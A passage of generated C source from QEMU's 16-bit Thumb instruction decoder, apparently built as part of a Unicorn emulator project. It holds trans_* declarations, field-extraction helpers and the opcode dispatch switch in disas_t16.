arg_LDM_t16; static bool trans_LDM_t16(DisasContext *ctx, arg_LDM_t16 *a); typedef arg_s_rrr_shi arg_MOV_rxri; static bool trans_MOV_rxri(DisasContext *ctx, arg_MOV_rxri *a); typedef arg_s_rrr_shi arg_ADD_rrri; static bool trans_ADD_rrri(DisasContext *ctx, arg_ADD_rrri *a); typedef arg_s_rrr_shi arg_SUB_rrri; static bool trans_SUB_rrri(DisasContext *ctx, arg_SUB_rrri *a); typedef arg_s_rri_rot arg_SUB_rri; static bool trans_SUB_rri(DisasContext *ctx, arg_SUB_rri *a); typedef arg_s_rri_rot arg_MOV_rxi; static bool trans_MOV_rxi(DisasContext *ctx, arg_MOV_rxi *a); typedef arg_s_rri_rot arg_CMP_xri; static bool trans_CMP_xri(DisasContext *ctx, arg_CMP_xri *a); typedef arg_r arg_BX; static bool trans_BX(DisasContext *ctx, arg_BX *a); typedef arg_r arg_BLX_r; static bool trans_BLX_r(DisasContext *ctx, arg_BLX_r *a); typedef arg_r arg_BXNS; static bool trans_BXNS(DisasContext *ctx, arg_BXNS *a); typedef arg_r arg_BLXNS; static bool trans_BLXNS(DisasContext *ctx, arg_BLXNS *a); typedef arg_rrr_rot arg_SXTAH; static bool trans_SXTAH(DisasContext *ctx, arg_SXTAH *a); typedef arg_rrr_rot arg_SXTAB; static bool trans_SXTAB(DisasContext *ctx, arg_SXTAB *a); typedef arg_rrr_rot arg_UXTAH; static bool trans_UXTAH(DisasContext *ctx, arg_UXTAH *a); typedef arg_rrr_rot arg_UXTAB; static bool trans_UXTAB(DisasContext *ctx, arg_UXTAB *a); typedef arg_setend arg_SETEND; static bool trans_SETEND(DisasContext *ctx, arg_SETEND *a); typedef arg_cps arg_CPS; static bool trans_CPS(DisasContext *ctx, arg_CPS *a); typedef arg_disas_t1616 arg_CPS_v7m; static bool trans_CPS_v7m(DisasContext *ctx, arg_CPS_v7m *a); typedef arg_rr arg_REV; static bool trans_REV(DisasContext *ctx, arg_REV *a); typedef arg_rr arg_REV16; static bool trans_REV16(DisasContext *ctx, arg_REV16 *a); typedef arg_rr arg_REVSH; static bool trans_REVSH(DisasContext *ctx, arg_REVSH *a); typedef arg_empty arg_YIELD; static bool trans_YIELD(DisasContext *ctx, arg_YIELD *a); typedef arg_empty arg_WFE; static bool trans_WFE(DisasContext *ctx, arg_WFE *a); typedef arg_empty arg_WFI; static bool trans_WFI(DisasContext *ctx, arg_WFI *a); typedef arg_empty arg_NOP; static bool trans_NOP(DisasContext *ctx, arg_NOP *a); typedef arg_disas_t1617 arg_IT; static bool trans_IT(DisasContext *ctx, arg_IT *a); typedef arg_i arg_HLT; static bool trans_HLT(DisasContext *ctx, arg_HLT *a); typedef arg_i arg_BKPT; static bool trans_BKPT(DisasContext *ctx, arg_BKPT *a); typedef arg_disas_t1618 arg_CBZ; static bool trans_CBZ(DisasContext *ctx, arg_CBZ *a); typedef arg_empty arg_UDF; static bool trans_UDF(DisasContext *ctx, arg_UDF *a); typedef arg_i arg_SVC; static bool trans_SVC(DisasContext *ctx, arg_SVC *a); typedef arg_ci arg_B_cond_thumb; static bool trans_B_cond_thumb(DisasContext *ctx, arg_B_cond_thumb *a); typedef arg_i arg_B; static bool trans_B(DisasContext *ctx, arg_B *a); typedef arg_i arg_BLX_suffix; static bool trans_BLX_suffix(DisasContext *ctx, arg_BLX_suffix *a); typedef arg_i arg_BL_BLX_prefix; static bool trans_BL_BLX_prefix(DisasContext *ctx, arg_BL_BLX_prefix *a); typedef arg_i arg_BL_suffix; static bool trans_BL_suffix(DisasContext *ctx, arg_BL_suffix *a); #ifdef CONFIG_PRAGMA_DIAGNOSTIC_AVAILABLE # pragma GCC diagnostic pop #endif static void disas_t16_extract_addsub_2h(DisasContext *ctx, arg_s_rrr_shi *a, uint16_t insn) { a->rm = extract32(insn, 3, 4); a->rd = deposit32(extract32(insn, 0, 3), 3, 29, extract32(insn, 7, 1)); a->rn = deposit32(extract32(insn, 0, 3), 3, 29, extract32(insn, 7, 1)); a->shim = 0; a->shty = 0; } static void disas_t16_extract_addsub_2i(DisasContext *ctx, arg_s_rri_rot *a, uint16_t insn) { a->imm = extract32(insn, 6, 3); a->rn = extract32(insn, 3, 3); a->rd = extract32(insn, 0, 3); a->s = t16_setflags(ctx); a->rot = 0; } static void disas_t16_extract_addsub_3(DisasContext *ctx, arg_s_rrr_shi *a, uint16_t insn) { a->rm = extract32(insn, 6, 3); a->rn = extract32(insn, 3, 3); a->rd = extract32(insn, 0, 3); a->s = t16_setflags(ctx); a->shim = 0; a->shty = 0; } static void disas_t16_extract_addsub_sp_i(DisasContext *ctx, arg_s_rri_rot *a, uint16_t insn) { a->s = 0; a->rd = 13; a->rn = 13; a->rot = 0; a->imm = times_4(ctx, extract32(insn, 0, 7)); } static void disas_t16_extract_arith_1i(DisasContext *ctx, arg_s_rri_rot *a, uint16_t insn) { a->rd = extract32(insn, 8, 3); a->imm = extract32(insn, 0, 8); a->rot = 0; a->rn = extract32(insn, 8, 3); } static void disas_t16_extract_branchr(DisasContext *ctx, arg_r *a, uint16_t insn) { a->rm = extract32(insn, 3, 4); } static void disas_t16_extract_disas_t16_Fmt_10(DisasContext *ctx, arg_ri *a, uint16_t insn) { a->rd = extract32(insn, 8, 3); a->imm = times_4(ctx, extract32(insn, 0, 8)); } static void disas_t16_extract_disas_t16_Fmt_11(DisasContext *ctx, arg_s_rri_rot *a, uint16_t insn) { a->rd = extract32(insn, 8, 3); a->rn = 13; a->s = 0; a->rot = 0; a->imm = times_4(ctx, extract32(insn, 0, 8)); } static void disas_t16_extract_disas_t16_Fmt_21(DisasContext *ctx, arg_setend *a, uint16_t insn) { a->E = extract32(insn, 3, 1); } static void disas_t16_extract_disas_t16_Fmt_22(DisasContext *ctx, arg_cps *a, uint16_t insn) { a->A = extract32(insn, 2, 1); a->I = extract32(insn, 1, 1); a->F = extract32(insn, 0, 1); a->mode = 0; a->M = 0; a->imod = plus_2(ctx, extract32(insn, 4, 1)); } static void disas_t16_extract_disas_t16_Fmt_23(DisasContext *ctx, arg_disas_t1616 *a, uint16_t insn) { a->im = extract32(insn, 4, 1); a->I = extract32(insn, 1, 1); a->F = extract32(insn, 0, 1); } static void disas_t16_extract_disas_t16_Fmt_25(DisasContext *ctx, arg_empty *a, uint16_t insn) { } static void disas_t16_extract_disas_t16_Fmt_26(DisasContext *ctx, arg_disas_t1617 *a, uint16_t insn) { a->cond_mask = extract32(insn, 0, 8); } static void disas_t16_extract_disas_t16_Fmt_27(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = extract32(insn, 0, 6); } static void disas_t16_extract_disas_t16_Fmt_28(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = extract32(insn, 0, 8); } static void disas_t16_extract_disas_t16_Fmt_29(DisasContext *ctx, arg_disas_t1618 *a, uint16_t insn) { a->nz = extract32(insn, 11, 1); a->rn = extract32(insn, 0, 3); a->imm = times_2(ctx, deposit32(extract32(insn, 3, 5), 5, 27, extract32(insn, 9, 1))); } static void disas_t16_extract_disas_t16_Fmt_3(DisasContext *ctx, arg_s_rri_rot *a, uint16_t insn) { a->rn = extract32(insn, 3, 3); a->rd = extract32(insn, 0, 3); a->s = t16_setflags(ctx); a->imm = 0; a->rot = 0; } static void disas_t16_extract_disas_t16_Fmt_30(DisasContext *ctx, arg_ldst_block *a, uint16_t insn) { a->i = 0; a->b = 1; a->u = 0; a->w = 1; a->rn = 13; a->list = t16_push_list(ctx, extract32(insn, 0, 9)); } static void disas_t16_extract_disas_t16_Fmt_31(DisasContext *ctx, arg_ldst_block *a, uint16_t insn) { a->i = 1; a->b = 0; a->u = 0; a->w = 1; a->rn = 13; a->list = t16_pop_list(ctx, extract32(insn, 0, 9)); } static void disas_t16_extract_disas_t16_Fmt_32(DisasContext *ctx, arg_ci *a, uint16_t insn) { a->cond = extract32(insn, 8, 4); a->imm = times_2(ctx, sextract32(insn, 0, 8)); } static void disas_t16_extract_disas_t16_Fmt_33(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = times_2(ctx, sextract32(insn, 0, 11)); } static void disas_t16_extract_disas_t16_Fmt_34(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = extract32(insn, 0, 11); } static void disas_t16_extract_disas_t16_Fmt_35(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = sextract32(insn, 0, 11); } static void disas_t16_extract_disas_t16_Fmt_4(DisasContext *ctx, arg_s_rrrr *a, uint16_t insn) { a->rn = extract32(insn, 3, 3); a->rd = extract32(insn, 0, 3); a->s = t16_setflags(ctx); a->rm = extract32(insn, 0, 3); a->ra = 0; } static void disas_t16_extract_extend(DisasContext *ctx, arg_rrr_rot *a, uint16_t insn) { a->rm = extract32(insn, 3, 3); a->rd = extract32(insn, 0, 3); a->rn = 15; a->rot = 0; } static void disas_t16_extract_ldst_ri_1(DisasContext *ctx, arg_ldst_ri *a, uint16_t insn) { a->imm = extract32(insn, 6, 5); a->rn = extract32(insn, 3, 3); a->rt = extract32(insn, 0, 3); a->p = 1; a->w = 0; a->u = 1; } static void disas_t16_extract_ldst_ri_2(DisasContext *ctx, arg_ldst_ri *a, uint16_t insn) { a->rn = extract32(insn, 3, 3); a->rt = extract32(insn, 0, 3); a->p = 1; a->w = 0; a->u = 1; a->imm = times_2(ctx, extract32(insn, 6, 5)); } static void disas_t16_extract_ldst_ri_4(DisasContext *ctx, arg_ldst_ri *a, uint16_t insn) { a->rn = extract32(insn, 3, 3); a->rt = extract32(insn, 0, 3); a->p = 1; a->w = 0; a->u = 1; a->imm = times_4(ctx, extract32(insn, 6, 5)); } static void disas_t16_extract_ldst_rr(DisasContext *ctx, arg_ldst_rr *a, uint16_t insn) { a->rm = extract32(insn, 6, 3); a->rn = extract32(insn, 3, 3); a->rt = extract32(insn, 0, 3); a->p = 1; a->w = 0; a->u = 1; a->shimm = 0; a->shtype = 0; } static void disas_t16_extract_ldst_spec_i(DisasContext *ctx, arg_ldst_ri *a, uint16_t insn) { a->rt = extract32(insn, 8, 3); a->p = 1; a->w = 0; a->u = 1; a->imm = times_4(ctx, extract32(insn, 0, 8)); } static void disas_t16_extract_ldstm(DisasContext *ctx, arg_ldst_block *a, uint16_t insn) { a->rn = extract32(insn, 8, 3); a->list = extract32(insn, 0, 8); a->i = 1; a->b = 0; a->u = 0; a->w = 1; } static void disas_t16_extract_lll_noshr(DisasContext *ctx, arg_s_rrr_shi *a, uint16_t insn) { a->rm = extract32(insn, 3, 3); a->rd = extract32(insn, 0, 3); a->s = t16_setflags(ctx); a->rn = extract32(insn, 0, 3); a->shim = 0; a->shty = 0; } static void disas_t16_extract_lxl_shr(DisasContext *ctx, arg_s_rrr_shr *a, uint16_t insn) { a->rs = extract32(insn, 3, 3); a->rd = extract32(insn, 0, 3); a->s = t16_setflags(ctx); a->rm = extract32(insn, 0, 3); a->rn = 0; } static void disas_t16_extract_rdm(DisasContext *ctx, arg_rr *a, uint16_t insn) { a->rm = extract32(insn, 3, 3); a->rd = extract32(insn, 0, 3); } static void disas_t16_extract_shift_i(DisasContext *ctx, arg_s_rrr_shi *a, uint16_t insn) { a->shim = extract32(insn, 6, 5); a->rm = extract32(insn, 3, 3); a->rd = extract32(insn, 0, 3); a->s = t16_setflags(ctx); a->rn = extract32(insn, 0, 3); } static void disas_t16_extract_xll_noshr(DisasContext *ctx, arg_s_rrr_shi *a, uint16_t insn) { a->rm = extract32(insn, 3, 3); a->rn = extract32(insn, 0, 3); a->s = 1; a->rd = 0; a->shim = 0; a->shty = 0; } static bool disas_t16(DisasContext *ctx, uint16_t insn) { union { arg_ci f_ci; arg_cps f_cps; arg_disas_t1616 f_disas_t1616; arg_disas_t1617 f_disas_t1617; arg_disas_t1618 f_disas_t1618; arg_empty f_empty; arg_i f_i; arg_ldst_block f_ldst_block; arg_ldst_ri f_ldst_ri; arg_ldst_rr f_ldst_rr; arg_r f_r; arg_ri f_ri; arg_rr f_rr; arg_rrr_rot f_rrr_rot; arg_s_rri_rot f_s_rri_rot; arg_s_rrr_shi f_s_rrr_shi; arg_s_rrr_shr f_s_rrr_shr; arg_s_rrrr f_s_rrrr; arg_setend f_setend; } u; switch ((insn >> 12) & 0xf) { case 0x0: /* 0000.... ........ */ disas_t16_extract_shift_i(ctx, &u.f_s_rrr_shi, insn); switch ((insn >> 11) & 0x1) { case 0x0: /* 00000... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:137 */ u.f_s_rrr_shi.shty = 0; if (trans_MOV_rxri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x1: /* 00001... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:138 */ u.f_s_rrr_shi.shty = 1; if (trans_MOV_rxri(ctx, &u.f_s_rrr_shi)) return true; return false; } return false; case 0x1: /* 0001.... ........ */ switch ((insn >> 11) & 0x1) { case 0x0: /* 00010... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:139 */ disas_t16_extract_shift_i(ctx, &u.f_s_rrr_shi, insn); u.f_s_rrr_shi.shty = 2; if (trans_MOV_rxri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x1: /* 00011... ........ */ switch ((insn >> 9) & 0x3) { case 0x0: /* 0001100. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:146 */ disas_t16_extract_addsub_3(ctx, &u.f_s_rrr_shi, insn); if (trans_ADD_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x1: /* 0001101. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:147 */ disas_t16_extract_addsub_3(ctx, &u.f_s_rrr_shi, insn); if (trans_SUB_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x2: /* 0001110. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:154 */ disas_t16_extract_addsub_2i(ctx, &u.f_s_rri_rot, insn); if (trans_ADD_rri(ctx, &u.f_s_rri_rot)) return true; return false; case 0x3: /* 0001111. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:155 */ disas_t16_extract_addsub_2i(ctx, &u.f_s_rri_rot, insn); if (trans_SUB_rri(ctx, &u.f_s_rri_rot)) return true; return false; } return false; } return false; case 0x2: /* 0010.... ........ */ disas_t16_extract_arith_1i(ctx, &u.f_s_rri_rot, insn); switch ((insn >> 11) & 0x1) { case 0x0: /* 00100... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:163 */ u.f_s_rri_rot.s = t16_setflags(ctx); if (trans_MOV_rxi(ctx, &u.f_s_rri_rot)) return true; return false; case 0x1: /* 00101... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:164 */ u.f_s_rri_rot.s = 1; if (trans_CMP_xri(ctx, &u.f_s_rri_rot)) return true; return false; } return false; case 0x3: /* 0011.... ........ */ disas_t16_extract_arith_1i(ctx, &u.f_s_rri_rot, insn); switch ((insn >> 11) & 0x1) { case 0x0: /* 00110... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:165 */ u.f_s_rri_rot.s = t16_setflags(ctx); if (trans_ADD_rri(ctx, &u.f_s_rri_rot)) return true; return false; case 0x1: /* 00111... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:166 */ u.f_s_rri_rot.s = t16_setflags(ctx); if (trans_SUB_rri(ctx, &u.f_s_rri_rot)) return true; return false; } return false; case 0x4: /* 0100.... ........ */ switch ((insn >> 11) & 0x1) { case 0x0: /* 01000... ........ */ switch ((insn >> 8) & 0x7) { case 0x0: /* 01000000 ........ */ switch ((insn >> 6) & 0x3) { case 0x0: /* 01000000 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:53 */ disas_t16_extract_lll_noshr(ctx, &u.f_s_rrr_shi, insn); if (trans_AND_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x1: /* 01000000 01...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:54 */ disas_t16_extract_lll_noshr(ctx, &u.f_s_rrr_shi, insn); if (trans_EOR_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x2: /* 01000000 10...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:55 */ disas_t16_extract_lxl_shr(ctx, &u.f_s_rrr_shr, insn); u.f_s_rrr_shr.shty = 0; if (trans_MOV_rxrr(ctx, &u.f_s_rrr_shr)) return true; return false; case 0x3: /* 01000000 11...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:56 */ disas_t16_extract_lxl_shr(ctx, &u.f_s_rrr_shr, insn); u.f_s_rrr_shr.shty = 1; if (trans_MOV_rxrr(ctx, &u.f_s_rrr_shr)) return true; return false; } return false; case 0x1: /* 01000001 ........ */ switch ((insn >> 6) & 0x3) { case 0x0: /* 01000001 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:57 */ disas_t16_extract_lxl_shr(ctx, &u.f_s_rrr_shr, insn); u.f_s_rrr_shr.shty = 2; if (trans_MOV_rxrr(ctx, &u.f_s_rrr_shr)) return true; return false; case 0x1: /* 01000001 01...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:58 */ disas_t16_extract_lll_noshr(ctx, &u.f_s_rrr_shi, insn); if (trans_ADC_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x2: /* 01000001 10...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:59 */ disas_t16_extract_lll_noshr(ctx, &u.f_s_rrr_shi, insn); if (trans_SBC_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x3: /* 01000001 11...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:60 */ disas_t16_extract_lxl_shr(ctx, &u.f_s_rrr_shr, insn); u.f_s_rrr_shr.shty = 3; if (trans_MOV_rxrr(ctx, &u.f_s_rrr_shr)) return true; return false; } return false; case 0x2: /* 01000010 ........ */ switch ((insn >> 6) & 0x3) { case 0x0: /* 01000010 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:61 */ disas_t16_extract_xll_noshr(ctx, &u.f_s_rrr_shi, insn); if (trans_TST_xrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x1: /* 01000010 01...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:62 */ disas_t16_extract_disas_t16_Fmt_3(ctx, &u.f_s_rri_rot, insn); if (trans_RSB_rri(ctx, &u.f_s_rri_rot)) return true; return false; case 0x2: /* 01000010 10...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:63 */ disas_t16_extract_xll_noshr(ctx, &u.f_s_rrr_shi, insn); if (trans_CMP_xrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x3: /* 01000010 11...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:64 */ disas_t16_extract_xll_noshr(ctx, &u.f_s_rrr_shi, insn); if (trans_CMN_xrri(ctx, &u.f_s_rrr_shi)) return true; return false; } return false; case 0x3: /* 01000011 ........ */ switch ((insn >> 6) & 0x3) { case 0x0: /* 01000011 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:65 */ disas_t16_extract_lll_noshr(ctx, &u.f_s_rrr_shi, insn); if (trans_ORR_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x1: /* 01000011 01...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:66 */ disas_t16_extract_disas_t16_Fmt_4(ctx, &u.f_s_rrrr, insn); if (trans_MUL(ctx, &u.f_s_rrrr)) return true; return false; case 0x2: /* 01000011 10...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:67 */ disas_t16_extract_lll_noshr(ctx, &u.f_s_rrr_shi, insn); if (trans_BIC_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x3: /* 01000011 11...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:68 */ disas_t16_extract_lll_noshr(ctx, &u.f_s_rrr_shi, insn); if (trans_MVN_rxri(ctx, &u.f_s_rrr_shi)) return true; return false; } return false; case 0x4: /* 01000100 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:174 */ disas_t16_extract_addsub_2h(ctx, &u.f_s_rrr_shi, insn); u.f_s_rrr_shi.s = 0; if (trans_ADD_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x5: /* 01000101 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:175 */ disas_t16_extract_addsub_2h(ctx, &u.f_s_rrr_shi, insn); u.f_s_rrr_shi.s = 1; if (trans_CMP_xrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x6: /* 01000110 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:176 */ disas_t16_extract_addsub_2h(ctx, &u.f_s_rrr_shi, insn); u.f_s_rrr_shi.s = 0; if (trans_MOV_rxri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x7: /* 01000111 ........ */ disas_t16_extract_branchr(ctx, &u.f_r, insn); switch (insn & 0x00000087) { case 0x00000000: /* 01000111 0....000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:191 */ if (trans_BX(ctx, &u.f_r)) return true; return false; case 0x00000004: /* 01000111 0....100 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:193 */ if (trans_BXNS(ctx, &u.f_r)) return true; return false; case 0x00000080: /* 01000111 1....000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:192 */ if (trans_BLX_r(ctx, &u.f_r)) return true; return false; case 0x00000084: /* 01000111 1....100 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:194 */ if (trans_BLXNS(ctx, &u.f_r)) return true; return false; } return false; } return false; case 0x1: /* 01001... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:118 */ disas_t16_extract_ldst_spec_i(ctx, &u.f_ldst_ri, insn); u.f_ldst_ri.rn = 15; if (trans_LDR_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x5: /* 0101.... ........ */ disas_t16_extract_ldst_rr(ctx, &u.f_ldst_rr, insn); switch ((insn >> 9) & 0x7) { case 0x0: /* 0101000. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:75 */ if (trans_STR_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x1: /* 0101001. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:76 */ if (trans_STRH_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x2: /* 0101010. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:77 */ if (trans_STRB_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x3: /* 0101011. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:78 */ if (trans_LDRSB_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x4: /* 0101100. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:79 */ if (trans_LDR_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x5: /* 0101101. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:80 */ if (trans_LDRH_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x6: /* 0101110. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:81 */ if (trans_LDRB_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x7: /* 0101111. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:82 */ if (trans_LDRSH_rr(ctx, &u.f_ldst_rr)) return true; return false; } return false; case 0x6: /* 0110.... ........ */ disas_t16_extract_ldst_ri_4(ctx, &u.f_ldst_ri, insn); switch ((insn >> 11) & 0x1) { case 0x0: /* 01100... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:93 */ if (trans_STR_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x1: /* 01101... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:94 */ if (trans_LDR_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x7: /* 0111.... ........ */ disas_t16_extract_ldst_ri_1(ctx, &u.f_ldst_ri, insn); switch ((insn >> 11) & 0x1) { case 0x0: /* 01110... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:95 */ if (trans_STRB_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x1: /* 01111... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:96 */ if (trans_LDRB_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x8: /* 1000.... ........ */ disas_t16_extract_ldst_ri_2(ctx, &u.f_ldst_ri, insn); switch ((insn >> 11) & 0x1) { case 0x0: /* 10000... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:104 */ if (trans_STRH_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x1: /* 10001... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:105 */ if (trans_LDRH_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x9: /* 1001.... ........ */ disas_t16_extract_ldst_spec_i(ctx, &u.f_ldst_ri, insn); switch ((insn >> 11) & 0x1) { case 0x0: /* 10010... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:113 */ u.f_ldst_ri.rn = 13; if (trans_STR_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x1: /* 10011... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:114 */ u.f_ldst_ri.rn = 13; if (trans_LDR_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0xa: /* 1010.... ........ */ switch ((insn >> 11) & 0x1) { case 0x0: /* 10100... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:122 */ disas_t16_extract_disas_t16_Fmt_10(ctx, &u.f_ri, insn); if (trans_ADR(ctx, &u.f_ri)) return true; return false; case 0x1: /* 10101... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:123 */ disas_t16_extract_disas_t16_Fmt_11(ctx, &u.f_s_rri_rot, insn); if (trans_ADD_rri(ctx, &u.f_s_rri_rot)) return true; return false; } return false; case 0xb: /* 1011.... ........ */ switch ((insn >> 10) & 0x1) { case 0x0: /* 1011.0.. ........ */ switch ((insn >> 8) & 0x1) { case 0x0: /* 1011.0.0 ........ */ switch (insn & 0x00000a80) { case 0x00000000: /* 10110000 0....... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:184 */ disas_t16_extract_addsub_sp_i(ctx, &u.f_s_rri_rot, insn); if (trans_ADD_rri(ctx, &u.f_s_rri_rot)) return true; return false; case 0x00000080: /* 10110000 1....... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:185 */ disas_t16_extract_addsub_sp_i(ctx, &u.f_s_rri_rot, insn); if (trans_SUB_rri(ctx, &u.f_s_rri_rot)) return true; return false; case 0x00000200: /* 10110010 0....... */ 